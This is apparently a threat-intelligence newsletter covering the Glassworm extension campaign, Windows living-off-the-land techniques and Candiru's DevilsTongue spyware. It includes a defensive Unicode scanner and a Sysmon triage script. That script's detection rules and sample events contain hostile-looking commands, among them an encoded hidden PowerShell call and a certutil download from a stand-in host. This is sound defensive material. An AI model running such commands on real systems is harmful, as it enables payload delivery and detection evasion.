TRENDING TOPICS DEC 02, 2025

Update: Glassworm Campaign Escalates Across Developer Extension Ecosystems 

Glassworm has advanced into a broader, more aggressive phase, with adversaries planting two dozen new malicious extensions on the Microsoft Visual Studio Marketplace and OpenVSX. These platforms distribute critical tooling for VS Code–compatible editors, which positions them as high-value entry points for infiltrating development environments. The threat actors rely on invisible Unicode characters to conceal harmful logic during initial review, enabling their uploads to pass standard validation. Once active on a workstation, the malware attempts to harvest credentials from GitHub, npm, and OpenVSX, while also probing data from dozens of widely used extensions and targeting cryptocurrency wallet information. Additional components configure a SOCKS proxy on the victim's device to relay outbound operations and deploy an HVNC module that grants remote, covert control.

Although both marketplaces removed the first wave and rotated compromised access tokens, the operators quickly returned with new publisher accounts and revised extension sets that restored the threat. Secure Annex's recent findings show that the third wave imitates trusted tooling across multiple development ecosystems, creating convincing stand-ins for popular frameworks, UI components, and coding utilities. The attackers initially submit non-malicious versions to gain approval, then push harmful updates once the extension is listed, ensuring minimal scrutiny. They further inflate download numbers to elevate placement in search results, causing their extensions to appear adjacent to well-known projects and increasing the probability of installation by unsuspecting developers.

The latest builds incorporate Rust-based payloads, demonstrating a clear investment in durability and cross-platform execution. Some variants continue to rely on Unicode manipulation to obscure key functions, reinforcing the campaign's focus on evasion.
Ongoing monitoring has identified additional fraudulent packages in both repositories, underscoring the operators' persistence and adaptability. Organizations should enforce strict extension-installation policies, verify publisher authenticity, and block or remove any items connected to the Glassworm identifiers until both marketplaces confirm full containment.
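The invisible-Unicode concealment described above can be checked for before an extension is approved for internal use. The following scanner is an added example, not code from Secure Annex or either marketplace; the code-point ranges, file suffixes, and the embedded sample are assumptions chosen for illustration.

```python
"""Scan VS Code extension sources for invisible Unicode that can hide logic from human review."""
import unicodedata
from pathlib import Path

# Code point ranges that render as nothing (or alter rendering) in typical editors.
# Added example list; extend it to match your own review policy.
INVISIBLE_RANGES = [
    (0x200B, 0x200F),    # zero-width space/non-joiner/joiner, LRM, RLM
    (0x2028, 0x2029),    # line and paragraph separators
    (0x202A, 0x202E),    # bidi embedding and override controls
    (0x2060, 0x2064),    # word joiner and invisible operators
    (0x2066, 0x2069),    # bidi isolates
    (0xFE00, 0xFE0F),    # variation selectors
    (0xE0000, 0xE007F),  # Unicode "tag" characters
    (0xE0100, 0xE01EF),  # variation selectors supplement
]

def is_invisible(ch):
    """True for characters in the ranges above, plus any format (Cf) or private-use (Co) code point."""
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES):
        return True
    return unicodedata.category(ch) in ("Cf", "Co")

def scan_text(text, path="<memory>"):
    """Return (path, line, column, 'U+XXXX', name) for every suspicious character in text."""
    findings = []
    for line_no, line in enumerate(text.split("\n"), 1):
        for col, ch in enumerate(line, 1):
            if ch == "\ufeff" and line_no == 1 and col == 1:
                continue  # a byte-order mark at the very start of a file is benign
            if is_invisible(ch):
                findings.append((path, line_no, col, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>")))
    return findings

def scan_extension(root, suffixes=(".js", ".mjs", ".cjs", ".ts", ".json")):
    """Walk an unpacked extension (e.g. an extracted .vsix) and scan every source-like file."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in suffixes:
            findings.extend(scan_text(p.read_text(encoding="utf-8", errors="replace"), str(p)))
    return findings

# Constructed sample: a zero-width space after a statement and tag characters appended to a call.
SAMPLE = "const token = process.env.TOKEN;\u200b\n" "fetch(url)\U000E0041\U000E0042;\n"

if __name__ == "__main__":
    for f in scan_text(SAMPLE, "extension.js"):
        print(*f)
```

Any finding outside a string literal or comment that contains legitimate non-Latin text should block approval until a reviewer explains it.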

Living-Off-the-Land Techniques Enable Adversaries to Evade Enterprise Security 

Researchers report a clear shift away from traditional offensive tooling, as threat actors now favor built-in Windows utilities to operate within networks without triggering alarms. Living Off the Land relies entirely on legitimate Microsoft-signed components already present on every system, allowing malicious activity to blend seamlessly with normal administrative work. Tools such as PowerShell, WMI, certutil[.]exe, and native scheduling mechanisms enable attackers to perform reconnaissance, execute commands remotely, download payloads, and maintain persistence while avoiding signature-based detection. Because these utilities are trusted and often essential for daily operations, defenders face a difficult balancing act between restricting them and disrupting mission-critical workflows. This creates a structural advantage for attackers, who can run the same commands administrators use, leaving almost no distinguishing markers for traditional EDR tools to analyze.

Investigations show that native tools are being pushed to their limits for credential theft, lateral movement, remote execution, and configuration tampering, all without dropping custom malware. PowerShell remains a primary vector for reconnaissance and credential access, while WMI enables fileless remote operations that never touch disk. These tactics overwhelm legacy monitoring approaches that rely on file signatures or simple process alerts, forcing defenders to adopt deeper visibility into execution patterns. Organizations are increasingly encouraged to enhance logging, track command-line activity, monitor WMI operations, deploy Sysmon for richer telemetry, and apply strict allowlisting paired with MFA and segmentation. The path forward requires moving past traditional detection models and embracing behavioral analytics, continuous threat hunting, and a stronger focus on identifying unusual administrative behavior across the network.
Strengthen visibility into native tool activity, enforce tighter operational controls, and prioritize behavior-driven detection practices to counter fileless attacker techniques.
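The command-line and parent-process telemetry recommended above is only useful once rules run over it. The triage script below is an added example, not code from the cited research; it assumes a JSON-lines export of Sysmon Event ID 1 records with the standard Image, ParentImage, CommandLine, Computer and User fields, and the sample events are constructed.

```python
"""Score Sysmon process-creation events (Event ID 1) for living-off-the-land patterns."""
import json
import re

def _base(path):
    """Lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

# Rule tuple: name, image file names, regex over CommandLine (None = any), required parent image (None = any).
# Added example rules keyed to the native utilities discussed above; tune exclusions per environment.
RULES = [
    ("powershell_encoded_command", {"powershell.exe", "pwsh.exe"}, r"\s-(e|ec|enc|encodedcommand)\s", None),
    ("powershell_download_cradle", {"powershell.exe", "pwsh.exe"}, r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", None),
    ("certutil_remote_fetch", {"certutil.exe"}, r"-urlcache|-decode", None),
    ("wmi_spawned_shell", {"cmd.exe", "powershell.exe"}, None, "wmiprvse.exe"),  # hallmark of remote WMI execution
    ("wmic_remote_node", {"wmic.exe"}, r"/node:", None),
    ("schtasks_create", {"schtasks.exe"}, r"/create", None),
]

def evaluate(e):
    """Names of the rules a Sysmon Event ID 1 record matches (empty list if none)."""
    if e.get("EventID") != 1:
        return []
    img, parent, cmd = _base(e.get("Image", "")), _base(e.get("ParentImage", "")), e.get("CommandLine", "")
    return [n for n, imgs, rx, par in RULES
            if img in imgs and (rx is None or re.search(rx, cmd, re.I)) and (par is None or parent == par)]

def triage(jsonl_text):
    """Parse a JSON-lines export; return (host, user, image, rules) for each matched event."""
    hits = []
    for line in jsonl_text.strip().splitlines():
        e = json.loads(line)
        if matched := evaluate(e):
            hits.append((e["Computer"], e["User"], _base(e["Image"]), matched))
    return hits

# Constructed sample export: benign admin activity mixed with the LOTL patterns above.
SAMPLE = r'''
{"EventID":1,"Computer":"WS01","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe Get-Service"}
{"EventID":1,"Computer":"WS01","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -NoP -W Hidden -enc QUJDRA=="}
{"EventID":1,"Computer":"WS02","User":"CORP\\svc_backup","Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"certutil -urlcache -f http://example.invalid/x.txt C:\\Users\\Public\\x.txt"}
{"EventID":1,"Computer":"WS02","User":"CORP\\svc_backup","Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"certutil -verify cert.cer"}
{"EventID":1,"Computer":"SRV01","User":"NT AUTHORITY\\NETWORK SERVICE","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","CommandLine":"cmd.exe /c whoami"}
{"EventID":3,"Computer":"SRV01","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"cmd.exe"}
'''

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(*hit)
```

Matches on service accounts or hosts where administrators never work interactively deserve the fastest follow-up, since that context is what separates routine administration from misuse of the same utility.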

Expanding DevilsTongue Operations Increase Risk to Windows Environments 

Recent findings from Insikt Group indicate a notable expansion of Candiru's operational infrastructure, reinforcing the threat it poses to Windows systems worldwide. The spyware vendor, known for developing the advanced Windows-targeting malware DevilsTongue, now operates across eight identified infrastructure clusters, with at least five still active. These clusters, tied to operators in regions including Hungary, Saudi Arabia, and Indonesia, demonstrate varied technical designs, ranging from direct management of victim-facing servers to the use of multilayered proxies and Tor-based routing to conceal command-and-control activity. DevilsTongue is engineered for deep system infiltration on Windows devices, enabling theft of browser data, system files, authentication material, and even content from encrypted messaging platforms. While historically deployed against political and civil-society targets, the malware's capabilities, cost structure, and broad global use mean that any individual or organization handling sensitive information faces elevated exposure if targeted through travel, cross-border partnerships, high-value negotiations, or supply-chain activity.

Candiru's persistence, despite sanctions and regulatory pressure, amplifies concern for U.S. enterprises operating Windows-heavy environments. The company has repeatedly shifted corporate identities to maintain operational continuity and has demonstrated resilience amid years of global efforts by governments and security researchers to disrupt its operations. Past reporting has confirmed infections linked to browser zero-day exploits, malicious document delivery, and modern ad-distribution networks, methods that can reach targets regardless of geography or political relevance. The rise of commercial spyware vendors has created an ecosystem in which advanced intrusion capabilities once limited to intelligence services are now accessible to foreign government clients with varying oversight practices.

U.S. organizations should enhance security baselines for all Windows devices, enable deep telemetry collection, implement targeted threat-hunting for spyware indicators, and enforce strict separation between personal and corporate technologies. Executive travelers and personnel involved in sensitive operational areas should receive elevated security controls and pre-travel risk briefings. Continuous monitoring and broader organizational awareness remain essential as commercial spyware ecosystems grow more capable and more globally distributed.

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.